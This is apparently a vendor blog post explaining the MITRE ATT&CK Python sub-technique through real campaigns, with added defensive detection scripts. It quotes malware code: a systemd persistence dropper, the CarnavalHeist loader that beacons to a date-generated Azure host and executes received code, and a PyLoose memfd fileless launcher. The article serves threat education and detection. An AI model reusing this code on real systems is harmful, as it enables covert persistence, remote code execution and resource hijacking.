T1059.006 Python in MITRE ATT&CK Explained

Sıla Özeren Hacıoğlu | 7 MIN READ | March 10, 2026

What Is T1059.006 Python in MITRE ATT&CK?

T1059.006 Python is a sub-technique of Command and Scripting Interpreter (T1059) in the MITRE ATT&CK framework, under the Execution tactic. It refers to the use of the Python programming language by adversaries to execute code and automate actions on compromised systems.

Python is a high-level, interpreted language known for its simplicity, extensive standard library, and cross-platform availability across Windows, Linux, and macOS. These characteristics make Python well suited for scripting, automation, and rapid development of functionality that can interact with operating system components, network services, and external libraries.

To read about other sub-techniques of the T1059 Command and Scripting Interpreter technique, you can visit the related hub blog.

Adversary Use of T1059.006 Python

Adversaries use T1059.006 Python to carry out malicious activities by leveraging a portable and flexible execution environment. Python scripts can be easily deployed across different operating systems and integrated into custom malware, loaders, or post-exploitation frameworks.

In attack campaigns, Python is commonly used to execute payloads, automate attack workflows, interact with network services, download additional components, and orchestrate follow-on actions such as persistence or lateral movement. Its readability and ease of modification allow attackers to rapidly adapt tooling while maintaining cross-platform compatibility, making Python a recurring element in modern adversary tradecraft.

Procedure Examples Used by Adversaries in Red Report 2026

The versatility and portability of Python render it a valuable asset for attackers in their operations. Python can seamlessly run on most operating systems and can be readily integrated into various tools and frameworks.

Python as a Vector for Cross-Platform Malware Delivery

For instance, according to an analysis released in December 2025, the Pakistan-based threat actor APT36 (also known as Transparent Tribe) demonstrated a significant evolution in its capabilities [1]. Historically focused on Windows-centric espionage against Indian government and defense entities, the group expanded its arsenal to include sophisticated Linux malware, specifically targeting the Bharat Operating System Solutions (BOSS) distribution used in India's public sector.

The swcbc Malware: A Python-Based RAT

The cornerstone of this new campaign is a malware strain identified as swcbc. Analysis confirms this is a Python-based Remote Administration Tool (RAT) compiled into a 64-bit ELF binary using PyInstaller. This compilation technique allows the malware to run on any compatible Linux system without requiring the victim to install Python dependencies manually.

Persistence via Systemd

To survive system reboots, swcbc leverages the systemd init system, which is standard across most modern Linux distributions including BOSS. The malware drops a shell script, swcbc.sh, which automates the creation of a user-level service. This technique allows the malware to persist without requiring root privileges, a common constraint in hardened government environments.

The following shell commands were recovered from the infection chain. The script creates a .service file in the user's configuration directory and enables it.

# Define service path and executable location
SERVICE_FILE="$HOME/.config/systemd/user/swcbc.service"
EXEC_PATH="$HOME/.swcbc/swcbc"

# Write the systemd unit file. A unit needs a [Service] section for ExecStart to be
# valid; the recovered listing shows an empty line at that point, so the header is
# assumed here.
echo "[Unit]" > "$SERVICE_FILE"
echo "Description=SWCBC Service" >> "$SERVICE_FILE"
echo "" >> "$SERVICE_FILE"
echo "[Service]" >> "$SERVICE_FILE"
echo "ExecStart=$EXEC_PATH" >> "$SERVICE_FILE"
echo "Restart=always" >> "$SERVICE_FILE"
echo "" >> "$SERVICE_FILE"
echo "[Install]" >> "$SERVICE_FILE"
echo "WantedBy=default.target" >> "$SERVICE_FILE"

# Reload the per-user manager and enable/start the service (no root required)
systemctl --user daemon-reload
systemctl --user enable swcbc.service
systemctl --user start swcbc.service

This script ensures the RAT is launched immediately upon user login (WantedBy=default.target) and restarts automatically if the process is killed (Restart=always).
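Hunting for this persistence from the defender's side, as an added example that is not code from the cited analysis or from Picus: a Python script that parses user-level unit files and flags the combination the dropper produces (a binary launched from a hidden directory outside the system paths, Restart=always, WantedBy=default.target). The two unit texts are constructed samples.

```python
import configparser
import glob
import os

# Constructed sample: the unit file that the dropper's echo commands write out.
SAMPLE_UNIT = """[Unit]
Description=SWCBC Service
[Service]
ExecStart=/home/user/.swcbc/swcbc
Restart=always
[Install]
WantedBy=default.target
"""
# Constructed benign user unit for comparison.
BENIGN_UNIT = "[Unit]\nDescription=SSH agent\n[Service]\nExecStart=/usr/bin/ssh-agent -D\nRestart=on-failure\n[Install]\nWantedBy=default.target\n"

SYSTEM_PREFIXES = ("/usr/", "/bin/", "/sbin/", "/lib/", "/opt/", "/snap/")

def assess_unit(text):
    """Return the list of indicators found in one unit file's text."""
    cp = configparser.ConfigParser(interpolation=None, strict=False, delimiters=("=",))
    cp.read_string(text)
    exec_start = cp.get("Service", "ExecStart", fallback="")
    binary = exec_start.split()[0] if exec_start else ""   # first token is the program
    found = []
    if binary and not binary.startswith(SYSTEM_PREFIXES):
        found.append("exec-outside-system-paths")
    if any(part.startswith(".") for part in binary.split("/")):
        found.append("exec-from-hidden-dir")              # e.g. ~/.swcbc/swcbc
    if cp.get("Service", "Restart", fallback="").lower() == "always":
        found.append("restart-always")
    if cp.get("Install", "WantedBy", fallback="") == "default.target":
        found.append("wanted-by-default-target")          # starts at user login
    return found

def scan_user_units(home=os.path.expanduser("~")):
    """Assess every unit in the user's systemd directory; returns {path: indicators}."""
    results = {}
    for path in glob.glob(os.path.join(home, ".config", "systemd", "user", "*.service")):
        with open(path, encoding="utf-8", errors="replace") as fh:
            found = assess_unit(fh.read())
        if "exec-outside-system-paths" in found:   # strongest signal; the rest add context
            results[path] = found
    return results
```

Benign user units also carry WantedBy=default.target, so that indicator alone is noise; the scan keys on the program location.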

Procedure Examples Used by Adversaries in Red Report 2025

Malicious Scripting for Credential Harvesting

In January 2024, CISA and the Federal Bureau of Investigation (FBI) released a joint Cybersecurity Advisory detailing the Androxgh0st malware, a Python-scripted threat primarily used to target .env files containing confidential information, such as credentials for high-profile applications like Amazon Web Services (AWS) and Microsoft Office 365 [2]. Threat actors deploying Androxgh0st have been observed exploiting specific vulnerabilities, including CVE-2017-9841, to remotely execute code on vulnerable websites via PHPUnit.

Downloading Malicious DLLs with Python-based Scripting

In May 2024, researchers reported on a campaign targeting Brazilian users with a new banking trojan named "CarnavalHeist" [3]. The attack chain involved a Windows batch file that downloaded a Python interpreter from the official Python FTP server and installed it in a malware-created folder. Subsequently, an embedded base64-encoded Python script was executed, serving as a loader to inject a malicious DLL payload into memory:

from time import sleep
import socket as ss
from random import choice
import winreg as w
import pickle
import os
from datetime import date


def ptvs():
    # Candidate C2 ports derived from today's date: the first four digits of
    # int("<day><month><year>") * x for x in 20, 24, ..., 56. Falls back to 443.
    import datetime
    try:
        d = datetime.date.today()
        y = []
        for x in range(20, 60, 4):
            y.append(int(str(int(int(f'{d.day}{d.month}{d.year}') * x))[:4]))
        return y
    except:
        return [443]


def lk():
    # Date-seeded hostname labels (a small DGA); each label is prefixed to the
    # Azure cloudapp domain used below. Falls back to a 'google<n>' label
    # (note: `di` is unbound if the exception is raised before it is assigned).
    import hashlib
    from datetime import date
    try:
        d = date.today()
        wi = d.weekday()
        di = d.day + wi
        l = 'efghijlmnopqrstuvxzwkyjtmnopqabcghjlabcd'[di]
        r = []
        for _ in range(5, 16, 5):
            # The final operand of the last term was garbled in the source
            # listing; `_` is assumed here from the neighbouring terms.
            t = hashlib.sha1(f"{di*wi+_}{l}{wi}{l}{d.month * di*_}{l}{d.year*di*_}".encode()).hexdigest()*10
            r.append(t[:45-_].replace(t[:di], l).lower())
        return r
    except:
        return [f'google{di}']


def p(c, n):
    # Read a string value from a key under HKEY_LOCAL_MACHINE.
    s2 = w.OpenKey(w.HKEY_LOCAL_MACHINE, c)
    return w.QueryValueEx(s2, n)[0]


pr = p(r'HARDWARE\DESCRIPTION\System\CentralProcessor\0', 'ProcessorNameString')
vs = p(r'SOFTWARE\Microsoft\Windows NT\CurrentVersion', 'ProductName')

while True:
    try:
        # Stops silently when the CPU model string contains "Broadwell".
        if "Broadwell" in pr:
            break
        with ss.socket(ss.AF_INET, ss.SOCK_STREAM) as s:
            s.settimeout(30)
            # Beacon to a date-derived host under brazilsouth.cloudapp.azure.com
            # on a date-derived port.
            s.connect((f'{choice(lk())}.brazilsouth.cloudapp.azure.com', choice(ptvs())))
            # Check-in string: version tag, hostname, OS product name, CPU name.
            s.send(f'pyCodeV6 - *NEWW* {ss.gethostname()} | {vs} | {pr}'.encode())
            info_bin = b''
            while True:
                c = s.recv(2048*100)
                if not c:
                    break
                info_bin += c
            # The reply is a pickled dict; its 'Codepy' entry is executed with
            # the other entries exposed as globals.
            info = pickle.loads(info_bin)
            exec(info['Codepy'], {'dataRec': info['file'], 'pymm': info['file2'], 'SaveRegggg': ss.gethostname().replace('-', '').replace(' ', '')})
            break
    except:
        sleep(2)
    sleep(1)
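As an added detection example, not from the Talos research or the Red Report: the chain above leaves a distinctive process-creation pattern, a python.exe running outside the standard install directories, spawned from cmd.exe, with a base64 blob on its command line. The events below are constructed; the malware folder name and the event field names (Image, ParentImage, CommandLine, as in Sysmon) are assumptions.

```python
import base64
import re

# Standard CPython install locations on Windows (all-users and per-user); extend for your estate.
STANDARD_PYTHON = re.compile(
    r"^c:\\(program files( \(x86\))?\\python\d*"
    r"|users\\[^\\]+\\appdata\\local\\programs\\python\\python\d+)\\python\.exe$"
)
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

def assess_python_launch(event):
    """Indicators for one process-creation event (dict with Image, ParentImage, CommandLine)."""
    image = event["Image"].lower()
    found = []
    if image.endswith("\\python.exe") and not STANDARD_PYTHON.match(image):
        found.append("interpreter-outside-standard-install")
    if event["ParentImage"].lower().endswith("\\cmd.exe"):
        found.append("launched-from-batch-shell")
    if re.search(r"\s-c\s", event["CommandLine"]):
        found.append("inline-script")
    for token in B64_TOKEN.findall(event["CommandLine"]):
        try:
            decoded = base64.b64decode(token, validate=True)
        except ValueError:       # not valid base64 after all
            continue
        if b"import " in decoded or b"exec(" in decoded:
            found.append("base64-embedded-python")
            break
    return found

def triage(events):
    """Return {index: indicators} for events where the interpreter itself is out of place."""
    hits = {}
    for i, event in enumerate(events):
        found = assess_python_launch(event)
        if "interpreter-outside-standard-install" in found:
            hits[i] = found
    return hits

# Constructed, harmless stand-in for the embedded loader script.
_STAGE = base64.b64encode(b"import socket\nprint(socket.gethostname())\n").decode()

# Constructed events: the first mirrors the batch file launching its private
# interpreter with a base64 script; the second is a developer's normal install.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\victim\AppData\Roaming\pyinst\python.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'python.exe -c "import base64;exec(base64.b64decode(\'' + _STAGE + '\'))"'},
    {"Image": r"C:\Users\dev\AppData\Local\Programs\Python\Python312\python.exe",
     "ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "CommandLine": "python.exe -m pytest tests"},
]
```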

Procedure Examples Used by Adversaries in Red Report 2024

Resource Hijacking (T1496)

Adversaries can leverage Python scripting for resource hijacking. For instance, PyLoose is a Python-based fileless malware that targets cloud workloads with a focus on executing a cryptominer directly in memory [4]. It gains initial access through vulnerable Jupyter Notebook services, which allow the execution of Python code and system commands. The malware is fetched from a public paste site using HTTPS, circumventing file system-based detection by loading directly into the Python runtime's memory. The script is concise, with only nine lines of code that decode and decompress an XMRig miner payload, then execute it in-memory using Linux's memfd feature, which creates file-like memory objects.

import ctypes, os, base64, zlib
l = ctypes.CDLL(None)
s = l.syscall
c = base64.b64decode(b'eNrsvX1cV0X30H4HGBZFZ3CLzI…')   # compressed XMRig payload (truncated here)
e = zlib.decompress(c)
f = s(319, ' ', 1)   # syscall 319 = memfd_create on x86-64, flag 1 = MFD_CLOEXEC
os.write(f, e)       # the decompressed ELF goes into the anonymous memory file
p = '/proc/self/fd/%d' % f
os.execle(p, 'smd', {})   # execute it from /proc/self/fd with argv[0] "smd"

This method of execution is stealthy, as it leaves no traditional file system footprint, making detection and forensic investigation difficult. The attack is sophisticated, employing evasion techniques and demonstrating an advanced level of threat actor skill, indicative of an adversary with significant capabilities in targeting cloud environments.
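To surface processes started this way, as an added example that is not from the cited research: the kernel exposes a memfd-backed executable through /proc/<pid>/exe as "/memfd:<name> (deleted)", and a binary removed from disk after launch as "<path> (deleted)", so a walk over /proc picks both out without any file on disk. The sample link targets are constructed.

```python
import os
import re

# readlink("/proc/<pid>/exe") for a memfd-backed program: "/memfd:<name> (deleted)"
MEMFD_EXE = re.compile(r"^/memfd:(?P<name>.*?)(?: \(deleted\))?$")
DELETED_SUFFIX = " (deleted)"

def classify_exe_link(target):
    """Classify one exe link target: ("memfd", name), ("deleted", path) or None if ordinary."""
    m = MEMFD_EXE.match(target)
    if m:
        return ("memfd", m.group("name"))
    if target.endswith(DELETED_SUFFIX):
        return ("deleted", target[:-len(DELETED_SUFFIX)])
    return None

def classify_links(links):
    """links: {pid: exe link target}; returns only the pids worth looking at."""
    hits = {}
    for pid, target in links.items():
        verdict = classify_exe_link(target)
        if verdict is not None:
            hits[pid] = verdict
    return hits

def scan_proc(proc_root="/proc"):
    """Live scan. Needs root (or CAP_SYS_PTRACE) to read other users' exe links."""
    links = {}
    for entry in os.listdir(proc_root):
        if entry.isdigit():
            try:
                links[int(entry)] = os.readlink(os.path.join(proc_root, entry, "exe"))
            except OSError:  # process already gone, kernel thread, or permission denied
                pass
    return classify_links(links)

# Constructed sample of what a scan returns: pid 2042 mirrors the snippet above
# (memfd named " ", argv[0] "smd"); pid 2043 is a miner whose file was deleted after start.
SAMPLE_LINKS = {
    101: "/usr/bin/python3",
    2042: "/memfd:  (deleted)",
    2043: "/tmp/.x/xmrig (deleted)",
}
```

A memfd process also shows no backing file in /proc/<pid>/maps, so the same check can be cross-validated there if an EDR agent already collects maps.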

Persistence and Malicious Code Execution

In August 2023, the National Police of Spain warned of an ongoing 'LockBit Locker' ransomware campaign targeting architecture companies through phishing emails [5].

In their attack campaigns, the attackers send emails from a made-up domain. They pretend to be a photography store looking for renovation plans to build trust with their targets. Once trust is established, they propose a meeting and provide an IMG file containing a disguised Windows shortcut. When this shortcut is activated, it triggers a Python script that checks for admin privileges.

Figure 1. Malicious Python Script of LockBit Locker Ransomware [5].

If admin rights are present, the script establishes persistence mechanisms on the system and executes the ransomware, encrypting the user's files. In cases where admin rights are absent, the script employs a UAC bypass technique to execute the ransomware with elevated privileges.

The sophistication of this campaign lies in its ability to convincingly mimic legitimate business inquiries, thereby evading standard anti-phishing defenses employed by companies.

References

[1] “APT36 Python Based ELF Malware Targeting Indian Government Entities,” CYFIRMA. Available: https://www.cyfirma.com/research/apt36-python-based-elf-malware-targeting-indian-government-entities/. [Accessed: Dec. 02, 2025]

[2] CISA and FBI, “Known Indicators of Compromise Associated with Androxgh0st Malware,” Cybersecurity Advisory AA24-016A, Jan. 2024. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-016a

[3] Cisco Talos, “New banking trojan ‘CarnavalHeist’ targets Brazil with overlay attacks,” Cisco Talos Blog, May 31, 2024. Available: https://blog.talosintelligence.com/new-banking-trojan-carnavalheist-targets-brazil/. [Accessed: Nov. 27, 2024]

[4] “PyLoose: Python-based fileless malware targets cloud workloads to deliver cryptominer,” wiz.io, Jul. 11, 2023. Available: https://www.wiz.io/blog/pyloose-first-python-based-fileless-attack-on-cloud-workloads. [Accessed: Dec. 20, 2023]

[5] B. Toulas, “Spain warns of LockBit Locker ransomware phishing attacks,” BleepingComputer, Aug. 28, 2023. Available: https://www.bleepingcomputer.com/news/security/spain-warns-of-lockbit-locker-ransomware-phishing-attacks/. [Accessed: Dec. 20, 2023]
